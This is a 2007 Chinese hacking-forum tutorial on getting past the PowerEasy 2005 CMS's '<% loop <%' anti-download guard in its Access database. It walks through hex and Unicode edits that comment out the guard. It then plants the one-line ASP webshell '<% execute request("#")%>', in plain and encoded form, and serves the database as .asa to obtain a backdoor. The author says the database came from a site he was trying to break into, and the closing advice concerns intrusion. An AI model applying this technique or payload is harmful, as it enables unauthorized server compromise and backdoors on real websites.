如何突破数据库Loop防下载实例
[原创]如何突破数据库Loop防下载实例文章作者:平安年间[S.H.C] ([url=http://vip8.org/][color=#0000ff]http://vip8.org[/color][/url])信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/][color=#0000ff]www.eviloctal.com[/color][/url])
此文发表于<<黑客手册>>2007年第六期,文章版权属于黑客手册。
用于测试的环境:
动易2005免费版下载地址:[url=http://down.chinaz.com/s/14661.asp][color=#0000ff]http://down.chinaz.com/s/14661.asp[/color][/url]
此版本相对于以前的版本几乎都补了漏洞了,什么上传漏洞,在顶部菜单里写一句话,都不行了,今天也不讨论是否还存在其它的漏洞,只是讨论一下如何备份数据库来拿shell。
先来说一下动易对数据库的处理:
动易在数据库里增加了一个表:PE-NotDown
在这个表里写入了十六进制数据:3C25206C6F6F70203C25
有人会不明白这个数据到底是什么东西啊,看也看不懂,其实这一串数据是”<% [b][color=#ff0000]loop[/color][/b] <%”的十六进制形式。虽然在数据表中是以十六进制的形式存在,但如果将mdb的数据库以asp的形式来解析的话,那就会以字符形式显示。略懂一点asp语法的人都知道"<% [b][color=#ff0000]loop[/color][/b] <%"是无法闭合的,而且[b][color=#ff0000]loop[/color][/b]也没有任何的do或是exit do来与之配对。我也曾试过很多次,都没有将其闭合。那么到底要怎么样才能将其闭合呢,其实说出来大家一定也觉得这不是很简单的吗,呵呵。比如下面一段代码:
<% [b][color=#ff0000]loop[/color][/b] <%
将其保存为一个asp文件解析时会提示,没有闭合,少了(% >),如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_13e139cf7fadc47.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10395¬humb=yes][b][color=#0000ff]01.JPG[/color][/b][/url] (14 KB)
2007-7-19 00:42
如果我们在后面加上一个"%>",还是会出错,那么到底要怎么样才能记将这段代码的功能去掉呢,大家再看下面一段代码:
<%'<% [b][color=#ff0000]loop[/color][/b] <%:%>
这段代码在IIS里运行是没有任何错误的,根据这段代码的原理,于是我们便有了突破的可能性,只要我们在数据库里的两个地方合适地插入"<%'"和":%>"( 在数据库中有时不要冒号也可以)即可将[b][color=#ff0000]loop[/color][/b]的防下载给过滤掉,相信大家看到这里也应该明白是怎么回事了。
上面讲的都是原理,我在本地对动易2005的数据库进行了测试,我们来看一下测试结果.(本次测试没有任何针对性,只作研究之用,对此方法的公布,本人不负任何责任)
首先安装动易,这个版本的动易基本上修补了一些漏洞,现在不谈是否有其它漏洞,只谈对数据库进行突破。我测试用到的数据库是从一个网站上下下来的数据库,因为一直想入侵这个网站,只拿到了数据库,所以在研究过程中研究的就是这个数据库,文章中所测试也也是这个数据库。下下来之后先将数据库进行备份,以后测试都用它的一个副本进行测试,因为在改动access的数据时是有些东西要注意的(后面会提到)。我们先将动易的数据的后缀名改成asa的,然后在iis里打开,打开结果跟上一幅图是一样的,也是出现少"% >"的错误,这便是动易的防下载处理。然后我们用UltraEdit打开动易的数据库,选择十六进制编辑,然后"<%"我们可以定位到如下的地方:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_ab38b753f3e61b9.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10396¬humb=yes][b][color=#0000ff]02.JPG[/color][/b][/url] (17 KB)
2007-7-19 00:42
我们可以看到显绿的一栏里可以看到"<% [b][color=#ff0000]loop[/color][/b] <%"这样的语句,证实了我们前面的说法,我们继续后发现只在[b][color=#ff0000]loop[/color][/b]的前后共有两个"<%",也就是是无法闭合的一条语句。那么我们要如何突破呢?前面也讲到了,在asp的语法里,单引号起注释的功能,我们是不是可以在它的前面加上注释的语句呢,再在另一个地方再插入闭合语句那不是可以进行突破了?打开数据库的表设计,我们先找一个地方来将它进行毕合,我们看到表PE-NotDown前后的表结构如下:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_6d6c68489531e4e.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10397¬humb=yes][b][color=#0000ff]03.JPG[/color][/b][/url] (12 KB)
2007-7-19 00:42
在这里,是不是可以在PE_NotDown的前面的一个表里加入代码将其后面的asp代码注释掉?进行测试吧,我选了PE_NewKeys,打开后在里面插入了一行代码,这里我用到了lake2的一个ascii2unicode的工具将代码"<%'x"(为什么后面有个x,其实用其它的字符也可以,只要转换的结果不出现问号即可)转换成"┼砧"(这样转换首先是在后台进行修改变得可行的,因为没有什么特殊字符,而且转换后的数据库改名为asa进行解析时能返回成原来的字符,如果需要知道具体情况,请去lake2的博客看),然后插入进去,如图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_f656e5028e2bead.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10398¬humb=yes][b][color=#0000ff]04.JPG[/color][/b][/url] (9 KB)
2007-7-19 00:42
保存后我们再将数据改为asa的后缀后打开,错误如第一幅图,少关闭符"% >",我们再用UltraEdit打开,"<%",搜到的第一个是与第二幅图是一样的,在第458行那里找以了[b][color=#ff0000]loop[/color][/b]语句,继续向下搜两次,我们在19118行那里搜到了我们刚刚插入的数据库,如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_dfdd723558d7f0b.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10399¬humb=yes][b][color=#0000ff]05.JPG[/color][/b][/url] (10 KB)
2007-7-19 00:42
我们来分析一下:"<% [b][color=#ff0000]loop[/color][/b] <%"是PE_NotDown里的数据,而"┼砧"是PE_NewKeys里的信息,虽然在表结构里PE_NewKeys排在PE_NotDown的前面,但能过asa解析后"<% [b][color=#ff0000]loop[/color][/b] <%"却在前面显示,因此access的数据改成asa的解析后其数据的出现顺序是发生了变化了的。那么我们要怎么样才能让其显示在前面呢,由于不知道其具体的结构顺序,我选择了穷举法。从第一个表开始,向每个字段里插入"┼砧",然后通过UltraEdit查看,看哪个会出现在前面,每次插入数据前都是用的原始动易数据库的一个副本,因为在access里,你将某条记录删除,虽然在表结构里看不到了,但其还是存在于数据库里,用UltraEdit还是能看到,只有对数据库进行压缩后那些删除的记录才会真正的删掉(这里说的压缩并不是用winrar压缩的那一种,而且access的压缩功能)。每次插完数据后再用UltraEdit字符"<%",便于更好的定位.
在一次一次的测试中,当试到PE_channel这个表时,问题出现转机。我们来看一下,打开数据表,定位到PE_channel这个表,在字段ChannelName里在"研究院新闻"的后面加入"┼砧",如图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_0c6a1b9a0c13098.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10400¬humb=yes][b][color=#0000ff]06.JPG[/color][/b][/url] (11 KB)
2007-7-19 00:42
保存后再用UltraEdit打开数据,用十六进制进行编辑,"<%",我们搜到的第一个结果如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_3436f252ba322a2.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10401¬humb=yes][b][color=#0000ff]07.JPG[/color][/b][/url] (11 KB)
2007-7-19 00:42
此时第一个出现的"<%"就不是原来的与[b][color=#ff0000]loop[/color][/b]相连的那个了,也就是说我们现在在[b][color=#ff0000]loop[/color][/b]前面就插入了一个asp标记符"<%",此时我们还得在[b][color=#ff0000]loop[/color][/b]后面的某一处地方再插入"%>"才能让其闭合,同样我采用穷举法测试后找到了另一个插入点。我们在最后一个标题后面加个"┠砾"(这是由" %>x"转换过来),如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_fddeac31b8e5dc8.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10402¬humb=yes][b][color=#0000ff]08.JPG[/color][/b][/url] (11 KB)
2007-7-19 00:42
保存后再用UltraEdit查看,"%>x",在第7546行那里找到了我们刚刚插入的信息,如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_a10123bae30c18f.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10403¬humb=yes][b][color=#0000ff]09.JPG[/color][/b][/url] (8 KB)
2007-7-19 00:42
我们现在来总结一下:
一共插入了两次数据:
第一次在插入的数据"┼砧"在第189行被解析成asp语句"<%'x"
第二次插入的数据"┠砾"在第7546行被解析成asp语句"%>x"
而动易原来防下载的语句"<% [b][color=#ff0000]loop[/color][/b] <%"是出现在第458行,正好处于两次插入的数据中间.此时我们将数据改名*.asa后在iis里解析,结果如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_9d3327ecb75c623.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10404¬humb=yes][b][color=#0000ff]10.JPG[/color][/b][/url] (59 KB)
2007-7-19 00:42
此时有一部分数据被解析出来了,那么我们的突破就达到了效果,于是我们想到将第一次插入的数据后面再加上"execute request("#")"不是可以拿到一个后门了?于是我将字符串“<% execute request("#")%>a<%'x”转换成Unicode字符“┼攠數畣整爠煥敵瑳∨∣┩愾┼砧”后插入到第一次插入数据的地方,如图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_888832cd462f5f3.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10405¬humb=yes][b][color=#0000ff]11.JPG[/color][/b][/url] (12 KB)
2007-7-19 00:42
再用UltraEdit查看插入的结果到我们插入的数据如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_bf5f84460a9583a.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10406¬humb=yes][b][color=#0000ff]12.JPG[/color][/b][/url] (13 KB)
2007-7-19 00:42
我们发现刚插入的数据出现在了第7405行,与第一次插的第189行,相差甚远,而且由于没有把[b][color=#ff0000]loop[/color][/b]语句包进去,数据库也无法解析了。于是我们只好退回到上一步,再找其它的地方下手。后来找了很久也没有找到,于是又回去研究能在IIS里显示的信息,我们看到如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_59312a54e3c21b9.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10407¬humb=yes][b][color=#0000ff]13.JPG[/color][/b][/url] (42 KB)
2007-7-19 00:42
大家看到这里有很多的“jpg|jpeg”等什么的,我们可以想到这里是保存上传类型数据的地方,我们可不可以将一句话马插到这里让它被解析呢。好了我也不再费话了,还是重新复制一个原始数据的复本,先按原来的步骤在ChannelNamer第一个标题和最后一个标题后面插入相关数据(照前面的方法进行),然后我将一句话马“<% execute request("#")%>a”转成Unicode字符“┼攠數畣整爠煥敵瑳∨∣┩愾”后插入到以下地方,如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_44f09e8ba239898.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10408¬humb=yes][b][color=#0000ff]14.JPG[/color][/b][/url] (14 KB)
2007-7-19 00:42
用UltraEdit打开后在第196行到“execute”,如下图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0707/58_65587_4f8e1cb88679d52.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img] [url=http://forum.eviloctal.com/attachment.php?aid=10409¬humb=yes][b][color=#0000ff]15.JPG[/color][/b][/url] (11 KB)
2007-7-19 00:42
在第189行到“<%' x”,如下图:
[img]http://img114.pp.sohu.com/images/blog/2007/4/18/14/0/1129ac5d290.JPG[/img]
在第483行到[b][color=#ff0000]loop[/color][/b],如下图:
[img]http://img64.pp.sohu.com/images/blog/2007/4/18/14/0/1129ac623d7.JPG[/img]
在第7403行搜到了我们的asp闭合语句,如下图:
[img]http://img45.pp.sohu.com/images/blog/2007/4/18/14/0/1129ac27aab.JPG[/img]
我已按先后顺序将其用图示标出,一句话后门在最前面,应能执行了。我们在iis里找开后得到结果如图19(打开时间有点长,根据数据库的大小):
[img]http://img64.pp.sohu.com/images/blog/2007/4/18/14/1/1129ac6d4d8.JPG[/img]
我们的一句话马成功执行,这样就突破了数据库的防下载功能,并能通过数据备份来获得后门。
后记:写完这篇文章之后,我用了其它动易2005的数据库进行了测试,按同样的方法进行插入,但没有得到想要的结果,看来这种方法是具体数据库要具体分析的,不同的数据库插入数据的地方是不同的,即使是同一数据库,只要数据发生变化了,插入的地方也可能是不同的,大家如果实验的话就得先按上面的方法进行插入和定位才行,切记在入侵中不可照搬,最好先将网站数据备份,如果不行还可以还原回来。有些要注意的地方,如果数据过大,用IIS打开时IIS可能会挂掉,机子性能要好。
页:
[1]